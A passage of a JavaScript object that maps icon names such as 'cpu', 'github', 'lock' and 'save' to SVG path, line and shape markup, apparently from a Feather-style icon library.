cpu: '<rect x="4" y="4" width="16" height="16" rx="2" ry="2"></rect><rect x="9" y="9" width="6" height="6"></rect><line x1="9" y1="1" x2="9" y2="4"></line><line x1="15" y1="1" x2="15" y2="4"></line><line x1="9" y1="20" x2="9" y2="23"></line><line x1="15" y1="20" x2="15" y2="23"></line><line x1="20" y1="9" x2="23" y2="9"></line><line x1="20" y1="14" x2="23" y2="14"></line><line x1="1" y1="9" x2="4" y2="9"></line><line x1="1" y1="14" x2="4" y2="14"></line>',
"credit-card": '<rect x="1" y="4" width="22" height="16" rx="2" ry="2"></rect><line x1="1" y1="10" x2="23" y2="10"></line>',
crop: '<path d="M6.13 1L6 16a2 2 0 0 0 2 2h15"></path><path d="M1 6.13L16 6a2 2 0 0 1 2 2v15"></path>',
crosshair: '<circle cx="12" cy="12" r="10"></circle><line x1="22" y1="12" x2="18" y2="12"></line><line x1="6" y1="12" x2="2" y2="12"></line><line x1="12" y1="6" x2="12" y2="2"></line><line x1="12" y1="22" x2="12" y2="18"></line>',
database: '<ellipse cx="12" cy="5" rx="9" ry="3"></ellipse><path d="M21 12c0 1.66-4 3-9 3s-9-1.34-9-3"></path><path d="M3 5v14c0 1.66 4 3 9 3s9-1.34 9-3V5"></path>',
delete: '<path d="M21 4H8l-7 8 7 8h13a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2z"></path><line x1="18" y1="9" x2="12" y2="15"></line><line x1="12" y1="9" x2="18" y2="15"></line>',
disc: '<circle cx="12" cy="12" r="10"></circle><circle cx="12" cy="12" r="3"></circle>',
"divide-circle": '<line x1="8" y1="12" x2="16" y2="12"></line><line x1="12" y1="16" x2="12" y2="16"></line><line x1="12" y1="8" x2="12" y2="8"></line><circle cx="12" cy="12" r="10"></circle>',
"divide-square": '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="8" y1="12" x2="16" y2="12"></line><line x1="12" y1="16" x2="12" y2="16"></line><line x1="12" y1="8" x2="12" y2="8"></line>',
divide: '<circle cx="12" cy="6" r="2"></circle><line x1="5" y1="12" x2="19" y2="12"></line><circle cx="12" cy="18" r="2"></circle>',
"dollar-sign": '<line x1="12" y1="1" x2="12" y2="23"></line><path d="M17 5H9.5a3.5 3.5 0 0 0 0 7h5a3.5 3.5 0 0 1 0 7H6"></path>',
"download-cloud": '<polyline points="8 17 12 21 16 17"></polyline><line x1="12" y1="12" x2="12" y2="21"></line><path d="M20.88 18.09A5 5 0 0 0 18 9h-1.26A8 8 0 1 0 3 16.29"></path>',
download: '<path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path><polyline points="7 10 12 15 17 10"></polyline><line x1="12" y1="15" x2="12" y2="3"></line>',
dribbble: '<circle cx="12" cy="12" r="10"></circle><path d="M8.56 2.75c4.37 6.03 6.02 9.42 8.03 17.72m2.54-15.38c-3.72 4.35-8.94 5.66-16.88 5.85m19.5 1.9c-3.5-.93-6.63-.82-8.94 0-2.58.92-5.01 2.86-7.44 6.32"></path>',
droplet: '<path d="M12 2.69l5.66 5.66a8 8 0 1 1-11.31 0z"></path>',
"edit-2": '<path d="M17 3a2.828 2.828 0 1 1 4 4L7.5 20.5 2 22l1.5-5.5L17 3z"></path>',
"edit-3": '<path d="M12 20h9"></path><path d="M16.5 3.5a2.121 2.121 0 0 1 3 3L7 19l-4 1 1-4L16.5 3.5z"></path>',
edit: '<path d="M11 4H4a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2v-7"></path><path d="M18.5 2.5a2.121 2.121 0 0 1 3 3L12 15l-4 1 1-4 9.5-9.5z"></path>',
"external-link": '<path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path><polyline points="15 3 21 3 21 9"></polyline><line x1="10" y1="14" x2="21" y2="3"></line>',
"eye-off": '<path d="M17.94 17.94A10.07 10.07 0 0 1 12 20c-7 0-11-8-11-8a18.45 18.45 0 0 1 5.06-5.94M9.9 4.24A9.12 9.12 0 0 1 12 4c7 0 11 8 11 8a18.5 18.5 0 0 1-2.16 3.19m-6.72-1.07a3 3 0 1 1-4.24-4.24"></path><line x1="1" y1="1" x2="23" y2="23"></line>',
eye: '<path d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z"></path><circle cx="12" cy="12" r="3"></circle>',
facebook: '<path d="M18 2h-3a5 5 0 0 0-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 0 1 1-1h3z"></path>',
"fast-forward": '<polygon points="13 19 22 12 13 5 13 19"></polygon><polygon points="2 19 11 12 2 5 2 19"></polygon>',
feather: '<path d="M20.24 12.24a6 6 0 0 0-8.49-8.49L5 10.5V19h8.5z"></path><line x1="16" y1="8" x2="2" y2="22"></line><line x1="17.5" y1="15" x2="9" y2="15"></line>',
figma: '<path d="M5 5.5A3.5 3.5 0 0 1 8.5 2H12v7H8.5A3.5 3.5 0 0 1 5 5.5z"></path><path d="M12 2h3.5a3.5 3.5 0 1 1 0 7H12V2z"></path><path d="M12 12.5a3.5 3.5 0 1 1 7 0 3.5 3.5 0 1 1-7 0z"></path><path d="M5 19.5A3.5 3.5 0 0 1 8.5 16H12v3.5a3.5 3.5 0 1 1-7 0z"></path><path d="M5 12.5A3.5 3.5 0 0 1 8.5 9H12v7H8.5A3.5 3.5 0 0 1 5 12.5z"></path>',
"file-minus": '<path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline><line x1="9" y1="15" x2="15" y2="15"></line>',
"file-plus": '<path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline><line x1="12" y1="18" x2="12" y2="12"></line><line x1="9" y1="15" x2="15" y2="15"></line>',
"file-text": '<path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline><line x1="16" y1="13" x2="8" y2="13"></line><line x1="16" y1="17" x2="8" y2="17"></line><polyline points="10 9 9 9 8 9"></polyline>',
file: '<path d="M13 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V9z"></path><polyline points="13 2 13 9 20 9"></polyline>',
film: '<rect x="2" y="2" width="20" height="20" rx="2.18" ry="2.18"></rect><line x1="7" y1="2" x2="7" y2="22"></line><line x1="17" y1="2" x2="17" y2="22"></line><line x1="2" y1="12" x2="22" y2="12"></line><line x1="2" y1="7" x2="7" y2="7"></line><line x1="2" y1="17" x2="7" y2="17"></line><line x1="17" y1="17" x2="22" y2="17"></line><line x1="17" y1="7" x2="22" y2="7"></line>',
filter: '<polygon points="22 3 2 3 10 12.46 10 19 14 21 14 12.46 22 3"></polygon>',
flag: '<path d="M4 15s1-1 4-1 5 2 8 2 4-1 4-1V3s-1 1-4 1-5-2-8-2-4 1-4 1z"></path><line x1="4" y1="22" x2="4" y2="15"></line>',
"folder-minus": '<path d="M22 19a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h5l2 3h9a2 2 0 0 1 2 2z"></path><line x1="9" y1="14" x2="15" y2="14"></line>',
"folder-plus": '<path d="M22 19a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h5l2 3h9a2 2 0 0 1 2 2z"></path><line x1="12" y1="11" x2="12" y2="17"></line><line x1="9" y1="14" x2="15" y2="14"></line>',
folder: '<path d="M22 19a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h5l2 3h9a2 2 0 0 1 2 2z"></path>',
framer: '<path d="M5 16V9h14V2H5l14 14h-7m-7 0l7 7v-7m-7 0h7"></path>',
frown: '<circle cx="12" cy="12" r="10"></circle><path d="M16 16s-1.5-2-4-2-4 2-4 2"></path><line x1="9" y1="9" x2="9.01" y2="9"></line><line x1="15" y1="9" x2="15.01" y2="9"></line>',
gift: '<polyline points="20 12 20 22 4 22 4 12"></polyline><rect x="2" y="7" width="20" height="5"></rect><line x1="12" y1="22" x2="12" y2="7"></line><path d="M12 7H7.5a2.5 2.5 0 0 1 0-5C11 2 12 7 12 7z"></path><path d="M12 7h4.5a2.5 2.5 0 0 0 0-5C13 2 12 7 12 7z"></path>',
"git-branch": '<line x1="6" y1="3" x2="6" y2="15"></line><circle cx="18" cy="6" r="3"></circle><circle cx="6" cy="18" r="3"></circle><path d="M18 9a9 9 0 0 1-9 9"></path>',
"git-commit": '<circle cx="12" cy="12" r="4"></circle><line x1="1.05" y1="12" x2="7" y2="12"></line><line x1="17.01" y1="12" x2="22.96" y2="12"></line>',
"git-merge": '<circle cx="18" cy="18" r="3"></circle><circle cx="6" cy="6" r="3"></circle><path d="M6 21V9a9 9 0 0 0 9 9"></path>',
"git-pull-request": '<circle cx="18" cy="18" r="3"></circle><circle cx="6" cy="6" r="3"></circle><path d="M13 6h3a2 2 0 0 1 2 2v7"></path><line x1="6" y1="9" x2="6" y2="21"></line>',
github: '<path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>',
gitlab: '<path d="M22.65 14.39L12 22.13 1.35 14.39a.84.84 0 0 1-.3-.94l1.22-3.78 2.44-7.51A.42.42 0 0 1 4.82 2a.43.43 0 0 1 .58 0 .42.42 0 0 1 .11.18l2.44 7.49h8.1l2.44-7.51A.42.42 0 0 1 18.6 2a.43.43 0 0 1 .58 0 .42.42 0 0 1 .11.18l2.44 7.51L23 13.45a.84.84 0 0 1-.35.94z"></path>',
globe: '<circle cx="12" cy="12" r="10"></circle><line x1="2" y1="12" x2="22" y2="12"></line><path d="M12 2a15.3 15.3 0 0 1 4 10 15.3 15.3 0 0 1-4 10 15.3 15.3 0 0 1-4-10 15.3 15.3 0 0 1 4-10z"></path>',
grid: '<rect x="3" y="3" width="7" height="7"></rect><rect x="14" y="3" width="7" height="7"></rect><rect x="14" y="14" width="7" height="7"></rect><rect x="3" y="14" width="7" height="7"></rect>',
"hard-drive": '<line x1="22" y1="12" x2="2" y2="12"></line><path d="M5.45 5.11L2 12v6a2 2 0 0 0 2 2h16a2 2 0 0 0 2-2v-6l-3.45-6.89A2 2 0 0 0 16.76 4H7.24a2 2 0 0 0-1.79 1.11z"></path><line x1="6" y1="16" x2="6.01" y2="16"></line><line x1="10" y1="16" x2="10.01" y2="16"></line>',
hash: '<line x1="4" y1="9" x2="20" y2="9"></line><line x1="4" y1="15" x2="20" y2="15"></line><line x1="10" y1="3" x2="8" y2="21"></line><line x1="16" y1="3" x2="14" y2="21"></line>',
headphones: '<path d="M3 18v-6a9 9 0 0 1 18 0v6"></path><path d="M21 19a2 2 0 0 1-2 2h-1a2 2 0 0 1-2-2v-3a2 2 0 0 1 2-2h3zM3 19a2 2 0 0 0 2 2h1a2 2 0 0 0 2-2v-3a2 2 0 0 0-2-2H3z"></path>',
heart: '<path d="M20.84 4.61a5.5 5.5 0 0 0-7.78 0L12 5.67l-1.06-1.06a5.5 5.5 0 0 0-7.78 7.78l1.06 1.06L12 21.23l7.78-7.78 1.06-1.06a5.5 5.5 0 0 0 0-7.78z"></path>',
"help-circle": '<circle cx="12" cy="12" r="10"></circle><path d="M9.09 9a3 3 0 0 1 5.83 1c0 2-3 3-3 3"></path><line x1="12" y1="17" x2="12.01" y2="17"></line>',
hexagon: '<path d="M21 16V8a2 2 0 0 0-1-1.73l-7-4a2 2 0 0 0-2 0l-7 4A2 2 0 0 0 3 8v8a2 2 0 0 0 1 1.73l7 4a2 2 0 0 0 2 0l7-4A2 2 0 0 0 21 16z"></path>',
home: '<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path><polyline points="9 22 9 12 15 12 15 22"></polyline>',
image: '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><circle cx="8.5" cy="8.5" r="1.5"></circle><polyline points="21 15 16 10 5 21"></polyline>',
inbox: '<polyline points="22 12 16 12 14 15 10 15 8 12 2 12"></polyline><path d="M5.45 5.11L2 12v6a2 2 0 0 0 2 2h16a2 2 0 0 0 2-2v-6l-3.45-6.89A2 2 0 0 0 16.76 4H7.24a2 2 0 0 0-1.79 1.11z"></path>',
info: '<circle cx="12" cy="12" r="10"></circle><line x1="12" y1="16" x2="12" y2="12"></line><line x1="12" y1="8" x2="12.01" y2="8"></line>',
instagram: '<rect x="2" y="2" width="20" height="20" rx="5" ry="5"></rect><path d="M16 11.37A4 4 0 1 1 12.63 8 4 4 0 0 1 16 11.37z"></path><line x1="17.5" y1="6.5" x2="17.51" y2="6.5"></line>',
italic: '<line x1="19" y1="4" x2="10" y2="4"></line><line x1="14" y1="20" x2="5" y2="20"></line><line x1="15" y1="4" x2="9" y2="20"></line>',
key: '<path d="M21 2l-2 2m-7.61 7.61a5.5 5.5 0 1 1-7.778 7.778 5.5 5.5 0 0 1 7.777-7.777zm0 0L15.5 7.5m0 0l3 3L22 7l-3-3m-3.5 3.5L19 4"></path>',
layers: '<polygon points="12 2 2 7 12 12 22 7 12 2"></polygon><polyline points="2 17 12 22 22 17"></polyline><polyline points="2 12 12 17 22 12"></polyline>',
layout: '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="3" y1="9" x2="21" y2="9"></line><line x1="9" y1="21" x2="9" y2="9"></line>',
"life-buoy": '<circle cx="12" cy="12" r="10"></circle><circle cx="12" cy="12" r="4"></circle><line x1="4.93" y1="4.93" x2="9.17" y2="9.17"></line><line x1="14.83" y1="14.83" x2="19.07" y2="19.07"></line><line x1="14.83" y1="9.17" x2="19.07" y2="4.93"></line><line x1="14.83" y1="9.17" x2="18.36" y2="5.64"></line><line x1="4.93" y1="19.07" x2="9.17" y2="14.83"></line>',
"link-2": '<path d="M15 7h3a5 5 0 0 1 5 5 5 5 0 0 1-5 5h-3m-6 0H6a5 5 0 0 1-5-5 5 5 0 0 1 5-5h3"></path><line x1="8" y1="12" x2="16" y2="12"></line>',
link: '<path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71"></path><path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71"></path>',
linkedin: '<path d="M16 8a6 6 0 0 1 6 6v7h-4v-7a2 2 0 0 0-2-2 2 2 0 0 0-2 2v7h-4v-7a6 6 0 0 1 6-6z"></path><rect x="2" y="9" width="4" height="12"></rect><circle cx="4" cy="4" r="2"></circle>',
list: '<line x1="8" y1="6" x2="21" y2="6"></line><line x1="8" y1="12" x2="21" y2="12"></line><line x1="8" y1="18" x2="21" y2="18"></line><line x1="3" y1="6" x2="3.01" y2="6"></line><line x1="3" y1="12" x2="3.01" y2="12"></line><line x1="3" y1="18" x2="3.01" y2="18"></line>',
loader: '<line x1="12" y1="2" x2="12" y2="6"></line><line x1="12" y1="18" x2="12" y2="22"></line><line x1="4.93" y1="4.93" x2="7.76" y2="7.76"></line><line x1="16.24" y1="16.24" x2="19.07" y2="19.07"></line><line x1="2" y1="12" x2="6" y2="12"></line><line x1="18" y1="12" x2="22" y2="12"></line><line x1="4.93" y1="19.07" x2="7.76" y2="16.24"></line><line x1="16.24" y1="7.76" x2="19.07" y2="4.93"></line>',
lock: '<rect x="3" y="11" width="18" height="11" rx="2" ry="2"></rect><path d="M7 11V7a5 5 0 0 1 10 0v4"></path>',
"log-in": '<path d="M15 3h4a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2h-4"></path><polyline points="10 17 15 12 10 7"></polyline><line x1="15" y1="12" x2="3" y2="12"></line>',
"log-out": '<path d="M9 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h4"></path><polyline points="16 17 21 12 16 7"></polyline><line x1="21" y1="12" x2="9" y2="12"></line>',
mail: '<path d="M4 4h16c1.1 0 2 .9 2 2v12c0 1.1-.9 2-2 2H4c-1.1 0-2-.9-2-2V6c0-1.1.9-2 2-2z"></path><polyline points="22,6 12,13 2,6"></polyline>',
"map-pin": '<path d="M21 10c0 7-9 13-9 13s-9-6-9-13a9 9 0 0 1 18 0z"></path><circle cx="12" cy="10" r="3"></circle>',
map: '<polygon points="1 6 1 22 8 18 16 22 23 18 23 2 16 6 8 2 1 6"></polygon><line x1="8" y1="2" x2="8" y2="18"></line><line x1="16" y1="6" x2="16" y2="22"></line>',
"maximize-2": '<polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" y1="3" x2="14" y2="10"></line><line x1="3" y1="21" x2="10" y2="14"></line>',
maximize: '<path d="M8 3H5a2 2 0 0 0-2 2v3m18 0V5a2 2 0 0 0-2-2h-3m0 18h3a2 2 0 0 0 2-2v-3M3 16v3a2 2 0 0 0 2 2h3"></path>',
meh: '<circle cx="12" cy="12" r="10"></circle><line x1="8" y1="15" x2="16" y2="15"></line><line x1="9" y1="9" x2="9.01" y2="9"></line><line x1="15" y1="9" x2="15.01" y2="9"></line>',
menu: '<line x1="3" y1="12" x2="21" y2="12"></line><line x1="3" y1="6" x2="21" y2="6"></line><line x1="3" y1="18" x2="21" y2="18"></line>',
"message-circle": '<path d="M21 11.5a8.38 8.38 0 0 1-.9 3.8 8.5 8.5 0 0 1-7.6 4.7 8.38 8.38 0 0 1-3.8-.9L3 21l1.9-5.7a8.38 8.38 0 0 1-.9-3.8 8.5 8.5 0 0 1 4.7-7.6 8.38 8.38 0 0 1 3.8-.9h.5a8.48 8.48 0 0 1 8 8v.5z"></path>',
"message-square": '<path d="M21 15a2 2 0 0 1-2 2H7l-4 4V5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2z"></path>',
"mic-off": '<line x1="1" y1="1" x2="23" y2="23"></line><path d="M9 9v3a3 3 0 0 0 5.12 2.12M15 9.34V4a3 3 0 0 0-5.94-.6"></path><path d="M17 16.95A7 7 0 0 1 5 12v-2m14 0v2a7 7 0 0 1-.11 1.23"></path><line x1="12" y1="19" x2="12" y2="23"></line><line x1="8" y1="23" x2="16" y2="23"></line>',
mic: '<path d="M12 1a3 3 0 0 0-3 3v8a3 3 0 0 0 6 0V4a3 3 0 0 0-3-3z"></path><path d="M19 10v2a7 7 0 0 1-14 0v-2"></path><line x1="12" y1="19" x2="12" y2="23"></line><line x1="8" y1="23" x2="16" y2="23"></line>',
"minimize-2": '<polyline points="4 14 10 14 10 20"></polyline><polyline points="20 10 14 10 14 4"></polyline><line x1="14" y1="10" x2="21" y2="3"></line><line x1="3" y1="21" x2="10" y2="14"></line>',
minimize: '<path d="M8 3v3a2 2 0 0 1-2 2H3m18 0h-3a2 2 0 0 1-2-2V3m0 18v-3a2 2 0 0 1 2-2h3M3 16h3a2 2 0 0 1 2 2v3"></path>',
"minus-circle": '<circle cx="12" cy="12" r="10"></circle><line x1="8" y1="12" x2="16" y2="12"></line>',
"minus-square": '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="8" y1="12" x2="16" y2="12"></line>',
minus: '<line x1="5" y1="12" x2="19" y2="12"></line>',
monitor: '<rect x="2" y="3" width="20" height="14" rx="2" ry="2"></rect><line x1="8" y1="21" x2="16" y2="21"></line><line x1="12" y1="17" x2="12" y2="21"></line>',
moon: '<path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path>',
"more-horizontal": '<circle cx="12" cy="12" r="1"></circle><circle cx="19" cy="12" r="1"></circle><circle cx="5" cy="12" r="1"></circle>',
"more-vertical": '<circle cx="12" cy="12" r="1"></circle><circle cx="12" cy="5" r="1"></circle><circle cx="12" cy="19" r="1"></circle>',
"mouse-pointer": '<path d="M3 3l7.07 16.97 2.51-7.39 7.39-2.51L3 3z"></path><path d="M13 13l6 6"></path>',
move: '<polyline points="5 9 2 12 5 15"></polyline><polyline points="9 5 12 2 15 5"></polyline><polyline points="15 19 12 22 9 19"></polyline><polyline points="19 9 22 12 19 15"></polyline><line x1="2" y1="12" x2="22" y2="12"></line><line x1="12" y1="2" x2="12" y2="22"></line>',
music: '<path d="M9 18V5l12-2v13"></path><circle cx="6" cy="18" r="3"></circle><circle cx="18" cy="16" r="3"></circle>',
"navigation-2": '<polygon points="12 2 19 21 12 17 5 21 12 2"></polygon>',
navigation: '<polygon points="3 11 22 2 13 21 11 13 3 11"></polygon>',
octagon: '<polygon points="7.86 2 16.14 2 22 7.86 22 16.14 16.14 22 7.86 22 2 16.14 2 7.86 7.86 2"></polygon>',
package: '<line x1="16.5" y1="9.4" x2="7.5" y2="4.21"></line><path d="M21 16V8a2 2 0 0 0-1-1.73l-7-4a2 2 0 0 0-2 0l-7 4A2 2 0 0 0 3 8v8a2 2 0 0 0 1 1.73l7 4a2 2 0 0 0 2 0l7-4A2 2 0 0 0 21 16z"></path><polyline points="3.27 6.96 12 12.01 20.73 6.96"></polyline><line x1="12" y1="22.08" x2="12" y2="12"></line>',
paperclip: '<path d="M21.44 11.05l-9.19 9.19a6 6 0 0 1-8.49-8.49l9.19-9.19a4 4 0 0 1 5.66 5.66l-9.2 9.19a2 2 0 0 1-2.83-2.83l8.49-8.48"></path>',
"pause-circle": '<circle cx="12" cy="12" r="10"></circle><line x1="10" y1="15" x2="10" y2="9"></line><line x1="14" y1="15" x2="14" y2="9"></line>',
pause: '<rect x="6" y="4" width="4" height="16"></rect><rect x="14" y="4" width="4" height="16"></rect>',
"pen-tool": '<path d="M12 19l7-7 3 3-7 7-3-3z"></path><path d="M18 13l-1.5-7.5L2 2l3.5 14.5L13 18l5-5z"></path><path d="M2 2l7.586 7.586"></path><circle cx="11" cy="11" r="2"></circle>',
percent: '<line x1="19" y1="5" x2="5" y2="19"></line><circle cx="6.5" cy="6.5" r="2.5"></circle><circle cx="17.5" cy="17.5" r="2.5"></circle>',
"phone-call": '<path d="M15.05 5A5 5 0 0 1 19 8.95M15.05 1A9 9 0 0 1 23 8.94m-1 7.98v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
"phone-forwarded": '<polyline points="19 1 23 5 19 9"></polyline><line x1="15" y1="5" x2="23" y2="5"></line><path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
"phone-incoming": '<polyline points="16 2 16 8 22 8"></polyline><line x1="23" y1="1" x2="16" y2="8"></line><path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
"phone-missed": '<line x1="23" y1="1" x2="17" y2="7"></line><line x1="17" y1="1" x2="23" y2="7"></line><path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
"phone-off": '<path d="M10.68 13.31a16 16 0 0 0 3.41 2.6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7 2 2 0 0 1 1.72 2v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.42 19.42 0 0 1-3.33-2.67m-2.67-3.34a19.79 19.79 0 0 1-3.07-8.63A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91"></path><line x1="23" y1="1" x2="1" y2="23"></line>',
"phone-outgoing": '<polyline points="23 7 23 1 17 1"></polyline><line x1="16" y1="8" x2="23" y2="1"></line><path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
phone: '<path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>',
"pie-chart": '<path d="M21.21 15.89A10 10 0 1 1 8 2.83"></path><path d="M22 12A10 10 0 0 0 12 2v10z"></path>',
"play-circle": '<circle cx="12" cy="12" r="10"></circle><polygon points="10 8 16 12 10 16 10 8"></polygon>',
play: '<polygon points="5 3 19 12 5 21 5 3"></polygon>',
"plus-circle": '<circle cx="12" cy="12" r="10"></circle><line x1="12" y1="8" x2="12" y2="16"></line><line x1="8" y1="12" x2="16" y2="12"></line>',
"plus-square": '<rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect><line x1="12" y1="8" x2="12" y2="16"></line><line x1="8" y1="12" x2="16" y2="12"></line>',
plus: '<line x1="12" y1="5" x2="12" y2="19"></line><line x1="5" y1="12" x2="19" y2="12"></line>',
pocket: '<path d="M4 3h16a2 2 0 0 1 2 2v6a10 10 0 0 1-10 10A10 10 0 0 1 2 11V5a2 2 0 0 1 2-2z"></path><polyline points="8 10 12 14 16 10"></polyline>',
power: '<path d="M18.36 6.64a9 9 0 1 1-12.73 0"></path><line x1="12" y1="2" x2="12" y2="12"></line>',
printer: '<polyline points="6 9 6 2 18 2 18 9"></polyline><path d="M6 18H4a2 2 0 0 1-2-2v-5a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v5a2 2 0 0 1-2 2h-2"></path><rect x="6" y="14" width="12" height="8"></rect>',
radio: '<circle cx="12" cy="12" r="2"></circle><path d="M16.24 7.76a6 6 0 0 1 0 8.49m-8.48-.01a6 6 0 0 1 0-8.49m11.31-2.82a10 10 0 0 1 0 14.14m-14.14 0a10 10 0 0 1 0-14.14"></path>',
"refresh-ccw": '<polyline points="1 4 1 10 7 10"></polyline><polyline points="23 20 23 14 17 14"></polyline><path d="M20.49 9A9 9 0 0 0 5.64 5.64L1 10m22 4l-4.64 4.36A9 9 0 0 1 3.51 15"></path>',
"refresh-cw": '<polyline points="23 4 23 10 17 10"></polyline><polyline points="1 20 1 14 7 14"></polyline><path d="M3.51 9a9 9 0 0 1 14.85-3.36L23 10M1 14l4.64 4.36A9 9 0 0 0 20.49 15"></path>',
repeat: '<polyline points="17 1 21 5 17 9"></polyline><path d="M3 11V9a4 4 0 0 1 4-4h14"></path><polyline points="7 23 3 19 7 15"></polyline><path d="M21 13v2a4 4 0 0 1-4 4H3"></path>',
rewind: '<polygon points="11 19 2 12 11 5 11 19"></polygon><polygon points="22 19 13 12 22 5 22 19"></polygon>',
"rotate-ccw": '<polyline points="1 4 1 10 7 10"></polyline><path d="M3.51 15a9 9 0 1 0 2.13-9.36L1 10"></path>',
"rotate-cw": '<polyline points="23 4 23 10 17 10"></polyline><path d="M20.49 15a9 9 0 1 1-2.12-9.36L23 10"></path>',
rss: '<path d="M4 11a9 9 0 0 1 9 9"></path><path d="M4 4a16 16 0 0 1 16 16"></path><circle cx="5" cy="19" r="1"></circle>',
save: '<path d="M19 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h11l5 5v11a2 2 0 0 1-2 2z"></path><polyline points="17 21 17 13 7 13 7 21"></polyline><polyline points="7 3 7 8 15 8"></polyline>',
